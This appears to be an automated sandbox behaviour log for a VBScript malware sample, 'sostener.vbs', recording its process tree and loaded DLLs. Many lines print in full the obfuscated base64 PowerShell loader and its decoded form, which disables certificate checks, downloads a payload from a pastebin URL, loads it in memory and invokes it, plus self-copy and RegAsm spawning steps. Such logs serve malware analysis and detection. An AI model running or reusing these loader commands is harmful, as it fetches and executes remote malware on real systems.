                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\sBk4oyHX2T5F6ww3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abdusf4f.udj.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sostener.vbsReversingLabs: Detection: 15%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbsJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
